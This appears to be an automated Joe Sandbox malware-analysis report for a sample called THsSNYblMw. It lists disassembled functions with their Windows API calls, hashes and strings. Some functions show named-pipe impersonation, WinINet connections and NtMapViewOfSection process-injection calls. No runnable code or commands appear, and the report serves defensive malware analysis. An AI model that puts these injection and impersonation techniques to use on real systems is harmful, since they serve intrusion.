Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken
String ID:
API String ID: 4232080776-0
Opcode ID: 63d816b5d70ed7ced87649dbe768fda66f973ffc67f04252ce0421f3c604c356
Instruction ID: d6283c94db11b9331fd4ebaa044dbf45ad25fc2e49a31086b82111e22681660c
Opcode Fuzzy Hash: 63d816b5d70ed7ced87649dbe768fda66f973ffc67f04252ce0421f3c604c356
Instruction Fuzzy Hash: D311EC35711684D2F7B0EFA1EC447A93363FB80B44F840526958A82675CF7DC99CDB11

Function 006BEA50 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006BEA8C

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

_invalid_parameter_noinfo.LIBCMT ref: 006BEA97
memcpy_s.LIBCMT ref: 006BEB5C
_fileno.LIBCMT ref: 006BEBC7
_filbuf.LIBCMT ref: 006BEBF5
_errno.LIBCMT ref: 006BEC45

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
Instruction ID: 9a67446fc2a231a9c51e9e347ab499c8898a97c0ada6326fa831123c1a0f95f5
Opcode Fuzzy Hash: 40b1f2a6e128636b5ea54999467d5c7a08cd77d7087e23116c772b60f44d2d31
Instruction Fuzzy Hash: 92517CF170435042DB288A6699006EA7A93F794BF4F188724AE3A47FD4CB3AC8D28740

Function 006C8208 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 006C8235

Part of subcall function 006C1D0C: _FF_MSGBANNER.LIBCMT ref: 006C1D29
Part of subcall function 006C1D0C: _NMSG_WRITE.LIBCMT ref: 006C1D33

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 006C82B8
EnterCriticalSection.KERNEL32 ref: 006C82D4
LeaveCriticalSection.KERNEL32 ref: 006C82E4
_calloc_crt.LIBCMT ref: 006C835A
__lock_fhandle.LIBCMT ref: 006C83C2

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
String ID:
API String ID: 445582508-0
Opcode ID: cb94c47234e7318eaf63806fd4c7d2241f139b70922057cc91e94235dbb42d3c
Instruction ID: 5e2ec1788123a50a22d801d5bdbf4a99a69362fb8d97d130c091118865377b0e
Opcode Fuzzy Hash: cb94c47234e7318eaf63806fd4c7d2241f139b70922057cc91e94235dbb42d3c
Instruction Fuzzy Hash: 16511332610B8086DB208F20D844B3EB3A6FB89B58F59552EDE4E477A5DF7CC852C740

Function 006B098C Relevance: 9.1, APIs: 6, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 006B473C: malloc.LIBCMT ref: 006B4758

Part of subcall function 006BE560: _errno.LIBCMT ref: 006BE4B7
Part of subcall function 006BE560: _invalid_parameter_noinfo.LIBCMT ref: 006BE4C2

fseek.LIBCMT ref: 006B0A28

Part of subcall function 006BEDE4: _errno.LIBCMT ref: 006BEE0C
Part of subcall function 006BEDE4: _invalid_parameter_noinfo.LIBCMT ref: 006BEE17

_ftelli64.LIBCMT ref: 006B0A30

Part of subcall function 006BEE58: _errno.LIBCMT ref: 006BEE76
Part of subcall function 006BEE58: _invalid_parameter_noinfo.LIBCMT ref: 006BEE81

fseek.LIBCMT ref: 006B0A40

Part of subcall function 006BEDE4: _fseek_nolock.LIBCMT ref: 006BEE35

GetFullPathNameA.KERNEL32 ref: 006B0A63
malloc.LIBCMT ref: 006B0A80

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

Part of subcall function 006ACFCC: malloc.LIBCMT ref: 006ACFDF

Part of subcall function 006ACFFC: htonl.WS2_32 ref: 006AD007

fclose.LIBCMT ref: 006B0B3D

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
String ID:
API String ID: 3587854850-0
Opcode ID: a569d82a0c52b606fced7d3ca32dedd0a036ca5e6a97fc9ef12d49b38375e880
Instruction ID: c24bba419f14ca10ccda40fc70e0cb59fc3bda01331147e89991a9a39ecdc458
Opcode Fuzzy Hash: a569d82a0c52b606fced7d3ca32dedd0a036ca5e6a97fc9ef12d49b38375e880
Instruction Fuzzy Hash: E441136231069046EB50EB22E4143AEB753FBC9BD0F408129EE5E47B96DF3EC582CB04

Function 006B43B0 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 006B43C8
GetOEMCP.KERNEL32 ref: 006B43D2
GetCurrentProcessId.KERNEL32 ref: 006B43F8
GetTickCount.KERNEL32 ref: 006B4400

Part of subcall function 006BE38C: _getptd.LIBCMT ref: 006BE394

GetCurrentProcess.KERNEL32 ref: 006B443C

Part of subcall function 006AFF70: GetModuleHandleA.KERNEL32 ref: 006AFF85
Part of subcall function 006AFF70: GetProcAddress.KERNEL32 ref: 006AFF95

GetCurrentProcessId.KERNEL32 ref: 006B44AE

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
String ID:
API String ID: 3426420785-0
Opcode ID: b6fc155a55da666bb393d8027138b05ac493bc84460806fdbb4add4f73d2445a
Instruction ID: fd2d8ed9456eb3dcd22152ae8230ccda7bb90c0140ff41fd83edf97b45f656d1
Opcode Fuzzy Hash: b6fc155a55da666bb393d8027138b05ac493bc84460806fdbb4add4f73d2445a
Instruction Fuzzy Hash: AA41D962B1061199FF40FBB1DC457ED63A3BF89784F404429DE0A47A65EE39C546CB18

Function 006AE724 Relevance: 9.1, APIs: 6, Instructions: 108networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006BC09C: RevertToSelf.ADVAPI32 ref: 006BC0AA

InternetOpenA.WININET ref: 006AE7E1
InternetSetOptionA.WININET ref: 006AE801
InternetSetOptionA.WININET ref: 006AE819
InternetConnectA.WININET ref: 006AE84F
InternetSetOptionA.WININET ref: 006AE88C
InternetSetOptionA.WININET ref: 006AE8B7

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Internet$Option$ConnectOpenRevertSelf
String ID:
API String ID: 1513466045-0
Opcode ID: dad49d787d011debb01431b698db0f5525ed4c0c9550348a44d35d6a50f0dafd
Instruction ID: e752f25dadabd2d476329566bb46ba2f89291c2f302360120759a7126dd7c906
Opcode Fuzzy Hash: dad49d787d011debb01431b698db0f5525ed4c0c9550348a44d35d6a50f0dafd
Instruction Fuzzy Hash: 8541017970078082EB64EB62F440BA977A7F796B84F004019EE8A07B55DF7DC552CB04

Function 006B55B4 Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006B55E6

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

htonl.WS2_32 ref: 006B5619
recvfrom.WS2_32 ref: 006B565D
WSAGetLastError.WS2_32 ref: 006B566A

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
String ID:
API String ID: 2310505145-0
Opcode ID: 018ee31d047f13e18eb2acc08179a8f443975026078621be6262547f92683203
Instruction ID: 9739407f9b1b8857f301ad988e13d714b261653fc11362cb96b2c49f4c24afcc
Opcode Fuzzy Hash: 018ee31d047f13e18eb2acc08179a8f443975026078621be6262547f92683203
Instruction Fuzzy Hash: CF41C3B6314FC0C6EB108F66E8447DA77A6F788BA8F244126DA4A47764DF39C4E1CB00

Function 0352D9A7 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0352D8FE

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

_invalid_parameter_noinfo.LIBCMT ref: 0352D909
_getstream.LIBCMT ref: 0352D929
_errno.LIBCMT ref: 0352D93B
_errno.LIBCMT ref: 0352D94D
_openfile.LIBCMT ref: 0352D97B

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
Instruction ID: 58302c88cc113d20c516a684ef3fd9ace00cc2cb16a1097a57eb0867500ee7ee
Opcode Fuzzy Hash: 2ee4da16ff171bafb35c0bb8db8b3dd677d1343b8b4ea0f09adf6440b25ff7f8
Instruction Fuzzy Hash: 0A218435618B5A4FE755EB2DB40432ABBF5FBCA210F05096AA45AC72B0DF74C8418792

Function 006BE560 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 006BE4B7

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

_invalid_parameter_noinfo.LIBCMT ref: 006BE4C2
_getstream.LIBCMT ref: 006BE4E2
_errno.LIBCMT ref: 006BE4F4
_errno.LIBCMT ref: 006BE506
_openfile.LIBCMT ref: 006BE534

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: b28fd23009c431afd31368ed49de371f4cc8ea00af4fe5c0ad9afbaa5be06d71
Instruction ID: 48a4fa0789967147460e3def26f0b4fc6de9d69f6f0cd9fd7cd5cffc8c3179d6
Opcode Fuzzy Hash: b28fd23009c431afd31368ed49de371f4cc8ea00af4fe5c0ad9afbaa5be06d71
Instruction Fuzzy Hash: CC113FE231478281E7615B719C013EEB7E7B7547C4F044529AD4887B15EF3EC5914704

Function 006AF89C Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 006AF8BD

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

free.LIBCMT ref: 006AF8F8
fwrite.LIBCMT ref: 006AF939
fclose.LIBCMT ref: 006AF941
free.LIBCMT ref: 006AF94E

Part of subcall function 006BD188: HeapFree.KERNEL32 ref: 006BD19E
Part of subcall function 006BD188: _errno.LIBCMT ref: 006BD1A8
Part of subcall function 006BD188: GetLastError.KERNEL32 ref: 006BD1B0

GetLastError.KERNEL32 ref: 006AF953

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$ErrorHeapLastfree$AllocFree_callnewhfclosefwritemalloc
String ID:
API String ID: 1616846154-0
Opcode ID: 55f7a226863731569709ab65466cf2251e8dcd047762f84c6fb73987460c01ea
Instruction ID: 48460d6546b045a4bfe438970052b557b43cc3c8e5857947dd7ef3ae4c9fa761
Opcode Fuzzy Hash: 55f7a226863731569709ab65466cf2251e8dcd047762f84c6fb73987460c01ea
Instruction Fuzzy Hash: F011C85130478041DA50F752A0513EE6393EB86FE0F844238FE6E5BB8AEE2DC9418B44

Function 006B2DB0 Relevance: 9.1, APIs: 6, Instructions: 51pipefileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 006B2DCE
WaitNamedPipeA.KERNEL32 ref: 006B2DE3
CreateFileA.KERNEL32 ref: 006B2E0D
SetNamedPipeHandleState.KERNEL32 ref: 006B2E2F
DisconnectNamedPipe.KERNEL32 ref: 006B2E3C
SetLastError.KERNEL32 ref: 006B2E51

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleStateWait
String ID:
API String ID: 3798860377-0
Opcode ID: 72c7b950336cc460e27c7b46ba728849a6f7e565e48342ed7c09114a024cd772
Instruction ID: 2f2d796006fbcb73bef1dfadd5d481364ffec1a05ca6c483419edb8b795d20da
Opcode Fuzzy Hash: 72c7b950336cc460e27c7b46ba728849a6f7e565e48342ed7c09114a024cd772
Instruction Fuzzy Hash: 7C11E37271465183F7108B62F96876E73A2FB84FE8F404215EA6A47B98CF7DC8968701

Function 006BCF70 Relevance: 9.0, APIs: 5, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006BCF93

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

malloc.LIBCMT ref: 006BCFA1

Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD25C
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD261

malloc.LIBCMT ref: 006BCFC3
_snprintf.LIBCMT ref: 006BCFDE

Part of subcall function 006BD57C: _errno.LIBCMT ref: 006BD5B3
Part of subcall function 006BD57C: _invalid_parameter_noinfo.LIBCMT ref: 006BD5BE

malloc.LIBCMT ref: 006BCFF9

Strings

HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 006BCFC8

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$AllocHeap_invalid_parameter_noinfo_snprintf
String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
API String ID: 3518644649-2739389480
Opcode ID: 905fd91b734610568c183788fb82b77138f36b50e46a72f9438916841788d806
Instruction ID: 2f62a003217e404ff1f72b6637a1b9b57db2d141abd436e187d2af2874ddf64e
Opcode Fuzzy Hash: 905fd91b734610568c183788fb82b77138f36b50e46a72f9438916841788d806
Instruction Fuzzy Hash: B801D2B1B01B9041D648DB12B84469D669AF789FE0F58822EEFA95BBC5DF38C0818740

Function 035135B7 Relevance: 8.9, APIs: 7, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03513604

Part of subcall function 0352C60F: _FF_MSGBANNER.LIBCMT ref: 0352C63F
Part of subcall function 0352C60F: _NMSG_WRITE.LIBCMT ref: 0352C649
Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C67D
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C688
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C693

malloc.LIBCMT ref: 0351360F

Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C6A3
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C6A8

free.LIBCMT ref: 035136F6
free.LIBCMT ref: 035136FE
free.LIBCMT ref: 03513706
free.LIBCMT ref: 03513712
free.LIBCMT ref: 0351371F

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
Instruction ID: 4d2d9bffdc65ff324226a355ddef14ff6b610f639dc895e2dac1581d69837d36
Opcode Fuzzy Hash: 5e3b48a2261c00200ba73531dd32d36e90c95496b5af35af7ab5b67e4a0c521d
Instruction Fuzzy Hash: B841F539728F1A4FE759EB6CE46057A77D4FB8A200740017DD84BC3262EE20E96687C6

Function 006A4170 Relevance: 8.9, APIs: 7, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006A41BD

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

malloc.LIBCMT ref: 006A41C8

Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD25C
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD261

free.LIBCMT ref: 006A42AF
free.LIBCMT ref: 006A42B7
free.LIBCMT ref: 006A42BF
free.LIBCMT ref: 006A42CB
free.LIBCMT ref: 006A42D8

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: 5fea0d21cf2f5f2329f70d6c53ffcf1dedb90211f69b270b285c9b89b2a82962
Instruction ID: 18d88f955541a6826e834d0918631b9d2edb0d1af07549f46964c3fba4c23eb3
Opcode Fuzzy Hash: 5fea0d21cf2f5f2329f70d6c53ffcf1dedb90211f69b270b285c9b89b2a82962
Instruction Fuzzy Hash: 6C4126223007829BDB18EB66AD503AD2752FB8ABC4F804524EF164B705EF75DD62CB00

Function 006AEEAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 006AEF25
htonl.WS2_32 ref: 006AEF2F
malloc.LIBCMT ref: 006AEF48
free.LIBCMT ref: 006AEFB5

Strings

zyxwvutsrqponmlk, xrefs: 006AEF84

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: htonl$freemalloc
String ID: zyxwvutsrqponmlk
API String ID: 1249573706-3884694604
Opcode ID: 4b290ff5cfd48bf3310a40f8a31e8720a67139a53a8d0e20d742a567524f9ec5
Instruction ID: dc3d5b18678748a7cff9a18598ddab5c948b19e78f9fa870e873e2159ef87fdd
Opcode Fuzzy Hash: 4b290ff5cfd48bf3310a40f8a31e8720a67139a53a8d0e20d742a567524f9ec5
Instruction Fuzzy Hash: 22213A613017404ADB94FB76A85136DA7D3EB89BC4F04403CAE4987756EE3DC8868704

Function 006B28D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 006B2913
GetProcAddress.KERNEL32 ref: 006B2923
GetLastError.KERNEL32 ref: 006B29EB

Part of subcall function 006BADBC: GetCurrentProcess.KERNEL32 ref: 006BAE49

Part of subcall function 006BB220: GetCurrentProcess.KERNEL32 ref: 006BB24D

Strings

ntdll.dll, xrefs: 006B2905
NtMapViewOfSection, xrefs: 006B2919

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressErrorHandleLastModuleProc
String ID: NtMapViewOfSection$ntdll.dll
API String ID: 1006775078-3170647572
Opcode ID: fb54ca6ed3380a5d95a5950137548b411ea98ddaf41e8d9134b8dda9b5f794fd
Instruction ID: bc45ce6861f8fada7e99af87c430c8850accb0b831a285f3e53ff8636aff7787
Opcode Fuzzy Hash: fb54ca6ed3380a5d95a5950137548b411ea98ddaf41e8d9134b8dda9b5f794fd
Instruction Fuzzy Hash: 2631F47271074482EB60AB62E4597AE73E2F788BB4F440329EF6907B94DF3CC4858744

Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 0040268A

Strings

CCG , xrefs: 004025F6

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

